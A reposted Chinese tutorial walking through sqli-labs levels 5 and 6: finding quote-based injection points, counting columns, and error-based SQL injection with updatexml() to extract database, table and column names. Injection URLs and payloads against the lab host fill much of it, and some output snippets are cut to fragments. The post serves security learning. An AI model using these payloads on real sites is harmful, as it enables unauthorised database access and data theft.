sqli-labs 靶场 less-5、6 第五关和第六关:判断注入点、使用错误函数注入爆库名、updatexml()函数

SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

database pic

Less 5

SQLI DUMB SERIES-5
判断注入点:1. 首先,尝试正常的回显内容,如?id=1。2. 接着,输入?id=1'来查看是否出现语句错误。如果出现,那么可能存在单引号的闭合问题。
判断当前表的字段数:使用order by语句来判断当前表的字段数。例如,?id=1' order by 3--和?id=1' order by 4--,通过页面回显的结果来确定字段数。
使用错误函数注入爆库名:1. 既然没有直接的回显信息,您可以使用MySQL的updatexml()函数来触发错误并提取信息。updatexml()函数在第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。2. 尝试使用类似?id=1' and updatexml(1, concat(0x7e, version()), 3)--的语句来提取数据库版本信息。3. 逐步构造更复杂的语句来提取其他信息,如数据库名、表名等。

判断注入点

通过测试可知使用单引号会使得系统报语法报错

http://sqli-labs.com/Less-5/
?id=1'

ur SQL syntax; check the manual that corresponds to your MySQL server version f
即使使用注释语句重新获取数据页面中也不回显数据。
u are in......
意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。
updatexml

updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。
语法:updatexml(XML_document,XPath_string,new_value)
XML_document:是string格式,为XML文档对象的名称
XPath_string:代表路径,Xpath格式的字符串例如
new_value:string格式,替换查找到的符合条件的数据
updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)

注入

通过报错注入代码,查看数据库名称:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",database()),3) --+

XPATH syntax erro
获取该数据库的表名:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(table_name) from information_schema.tables where table_schema='security')
),3) --+

ls,referers,u
注入查询users表的列名:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')
),3) --+

sername,p

Less 6

SQLI DUMB SERIES-5
判断注入点:同第五关。
判断当前表的字段数:同第五关。
使用错误函数注入提取信息:同第五关。

判断注入点

输入双引号后报错的响应可知为闭合符号:

http://sqli-labs.com/Less-6/
?id=1"

sqli dump
继续判断字段数量,当数字为3时没报错,得知为3个字段。

http://sqli-labs.com/Less-6/
?id=1" order by 3 --+

e Dhak

注入

输入正确不返回数据,则我们通过错误函数注入获取数据库。

http://sqli-labs.com/Less-6/
?id=1" union select updatexml(1,concat('~',database()),3); --+

sqli dumb
在错误函数注入中输入语句,用于获取该数据库表名

http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(table_name) from information_schema.tables where table_schema=database())
),3); --+

_concat(table_na
注入获取数据表列名。

http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')
),3); --+

tabase()

系列文章

  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/23774.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Hadoop3:MapReduce源码解读之Map阶段的TextInputFormat切片机制(3)

Hadoop3:MapReduce源码解读之Map阶段的TextInputFormat切片机制(3)

Job那块的断点代码截图省略,直接进入切片逻辑 参考:Hadoop3:MapReduce源码解读之Map阶段的Job任务提交流程(1) 5、TextInputFormat源码解析 类的继承关系 它的内容比较少 重写了两个父类的方法 这里关心一下泛型参数…
阅读更多...
【Python报错】已解决Attributeerror: ‘list‘ object has no attribute ‘join‘( Solved)

【Python报错】已解决Attributeerror: ‘list‘ object has no attribute ‘join‘( Solved)

解决Python报错:AttributeError: ‘list’ object has no attribute ‘join’ (Solved) 在Python中,字符串(str)对象有一个非常有用的join()方法,它允许你将序列中的元素连接(join)成一个字符串…
阅读更多...
机器学习笔记 - 本地windows 11 + PyCharm运行stable diffusion流程简述

机器学习笔记 - 本地windows 11 + PyCharm运行stable diffusion流程简述

一、环境说明 硬件:本地电脑windows11、32.0 GB内存、2060的6G的卡。 软件:本地有一个python环境,主要是torch 2.2.2+cu118 二、准备工作 1、下载模型 https://huggingface.co/CompVishttps://huggingface.co/CompVis 进入上面的网址,我这里下载的是这个里面的 …
阅读更多...
最新付会进群多群同时变现社群系统V3.5.3版本 详细教程+源码下载

最新付会进群多群同时变现社群系统V3.5.3版本 详细教程+源码下载

市面1888最新付费进群多群同时变现系统V3.5.3版本 详细教程源码下载介绍: 续男粉变现,相亲群变现后 演化出来的最新多群同时变现系统 可同时进行40个群同时变现 可设置地域群,相亲,男粉变现等多种群 购买后包括详细的 域名服…
阅读更多...
人工智能安全综述

人工智能安全综述

文 | 华北电力大学 李建彬 谯婷 秦淑梅 李智勇 近年来,人工智能技术发展取得了长足的进步,在多个领域广泛应用,特别是以 ChatGPT 为代表的生成式人工智能技术开启了人工智能应用的新纪元。随着人工智能技术及应用的迅猛发展,也带…
阅读更多...
Linux文件系统(操作系统的文件管理)

Linux文件系统(操作系统的文件管理)

一.Linux系统的文件接口 我们先介绍下Linux系统俩种的文件接口&#xff0c;引出一些问题。 1.open&#xff08;&#xff09; 我们看下说明&#xff1a; #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h>int open(const char *pathname,…
阅读更多...
HOW - 用 Typescript 编写一个比较好的 Class

HOW - 用 Typescript 编写一个比较好的 Class

目录 一、介绍二、示例2.1 示例类代码2.2 单元测试 一、介绍 代码格式统一。包括统一缩进和尽量使用清晰且统一风格的变量和函数命名注释和文档。编写必要且清晰的注释和文档使用让面试官眼前一亮的现代新特性&#xff0c;代码简洁。例如可选链&#xff08;Optional Chaining&…
阅读更多...
《大道平渊》· 拾 —— 身心的“肥胖”与我们不知饥渴的病:追求中的丰盈与节制

《大道平渊》· 拾 —— 身心的“肥胖”与我们不知饥渴的病:追求中的丰盈与节制

《平渊》 拾 "水满则溢&#xff0c;月盈则亏。" 《道德经》有言&#xff1a;"水满则溢&#xff0c;月盈则亏"。 意思是&#xff1a;水满了就会溢出&#xff0c;月亮最圆的时候就会走向亏的状态。 这揭示了自然界和人类社会中一切事物的内在规律 —— 任…
阅读更多...
[office] excel表格锁定计算公式的方法步骤 #经验分享#媒体#职场发展

[office] excel表格锁定计算公式的方法步骤 #经验分享#媒体#职场发展

excel表格锁定计算公式的方法步骤 Excel中经常需要使用到表格锁定公式的技巧&#xff0c;计算公式具体该如何锁定呢?接下来是小编为大家带来的excel表格锁定计算公式的方法&#xff0c;供大家参考。 excel表格锁定计算公式的方法 计算公式锁定步骤1&#xff1a;如图&#xff0…
阅读更多...
Proxmox VE虚拟机与容器管理平台安装指南

Proxmox VE虚拟机与容器管理平台安装指南

上篇文章说了ESXI和Proxmox VE&#xff08;简称pve&#xff09;区别&#xff0c;由于需要从esxi5.迁移到PVE8.2&#xff0c;所以开始简单的在一个测试机上的部署个说明指南&#xff0c;以备无患。 一、引言 Proxmox VE是一款基于Debian Linux的完全开源平台&#xff0c;专为虚…
阅读更多...
6-Maven的使用

6-Maven的使用

6-Maven的使用 常用maven命令 //常用maven命令 mvn -v //查看版本 mvn archetype:create //创建 Maven 项目 mvn compile //编译源代码 mvn test-compile //编译测试代码 mvn test //运行应用程序中的单元测试 mvn site //生成项目相关信息的网站 mvn package //依据项目生成 …
阅读更多...
【代码随想录】【算法训练营】【第30天】 [322]重新安排行程 [51]N皇后 [37]解数独

【代码随想录】【算法训练营】【第30天】 [322]重新安排行程 [51]N皇后 [37]解数独

前言 思路及算法思维&#xff0c;指路 代码随想录。 题目来自 LeetCode。 day 30&#xff0c;周四&#xff0c;好难&#xff0c;会不了一点~ 题目详情 [322] 重新安排行程 题目描述 322 重新安排行程 解题思路 前提&#xff1a;…… 思路&#xff1a;回溯。 重点&…
阅读更多...
023、键管理_数据库

023、键管理_数据库

dbsize、select、flushdb/flushall命令。 1.切换数据库 select dbIndexRedis默认配置中是有16个数据库: databases 16 select15选择最后一个数据库,不同库可以存在相同的键: 127.0.0.1:6379> set hello world #默认进到0号数据库 OK 127.0.0.1:6379> get hello &qu…
阅读更多...
RabbitMQ--Hello World(基础详解)

RabbitMQ--Hello World(基础详解)

文章目录 先决条件RabbitMQ 初识RabbitMQ--Hello World发送接收 更多相关内容可查看 先决条件 本教程假定 RabbitMQ 已安装并在标准端口 &#xff08;5672&#xff09; 上运行。如果你 使用不同的主机、端口或凭据&#xff0c;连接设置将需要 调整。如未安装可查看Windows下载…
阅读更多...
【机器学习通用流程】

【机器学习通用流程】

文章目录 一、机器学习概述1. 机器学习的定义2. 机器学习的分类3. 机器学习的应用实例 二、数据准备和预处理1. 数据采集2. 数据清洗3. 数据转换 三、选择合适的机器学习模型1. 常见的机器学习模型决策树&#xff08;Decision Trees&#xff09;支持向量机&#xff08;Support …
阅读更多...
Nvidia/算能 +FPGA+AI大算力边缘计算盒子:桥梁结构安全监测

Nvidia/算能 +FPGA+AI大算力边缘计算盒子:桥梁结构安全监测

中国铁路设计集团有限公司&#xff08;简称中国铁设&#xff09;&#xff0c;原铁道第三勘察设计院集团有限公司&#xff08;铁三院&#xff09;&#xff0c;是中国国家铁路集团有限公司所属的唯一设计企业&#xff0c;成立于1953年&#xff0c;总部位于天津市&#xff0c;是以…
阅读更多...
f4pga环境搭建教程

f4pga环境搭建教程

f4pga环境搭建教程 背景介绍 FOSS Flows For FPGA (F4PGA) project&#xff0c;是一套开源的FPGA工具链&#xff0c;号称the GCC of FPGAs&#xff0c;作用是将写的硬件描述语言&#xff08;verilog或VHDL&#xff09;转化为可以在FPGA上运行的可执行文件&#xff08;bit文件…
阅读更多...
滨江区代理记账——专业、便捷的服务,让您的企业更加规范、高效

滨江区代理记账——专业、便捷的服务,让您的企业更加规范、高效

随着社会经济的发展和企业的规模扩大&#xff0c;依法纳税、做好财务工作变得越来越重要&#xff0c;而代理记账&#xff0c;就是这样一个专业的服务平台&#xff0c;为满足广大企业和个体户的会计需求&#xff0c;帮助他们规范财务管理&#xff0c;提高效率。 代理记账可以帮助…
阅读更多...
基于R语言BIOMOD2 及机器学习方法的物种分布模拟与案例分析

基于R语言BIOMOD2 及机器学习方法的物种分布模拟与案例分析

原文链接&#xff1a;基于R语言BIOMOD2 及机器学习方法的物种分布模拟与案例分析https://mp.weixin.qq.com/s?__bizMzUzNTczMDMxMg&mid2247606139&idx4&snf94ec30bfb5fa7ac0320403d49db3b66&chksmfa821e9ccdf5978a44a9ba96f6e04a121c0bbf63beea0940b385011c0b…
阅读更多...
MLU370-M8 chattts-ui快速出击

MLU370-M8 chattts-ui快速出击

目录 一、paas平台环境选择二、代码环境准备1.代码下载2.环境安装modelsopetransformersaccelerate 3.常规pip安装4.代码修改4.代码修改 三.算法启动 一、paas平台环境选择 驱动选择&#xff1a;5.10.22及以上 镜像选择&#xff1a;pytorch2.1 二、代码环境准备 1.代码下载…
阅读更多...
最新文章

Copyright @ 2022~2023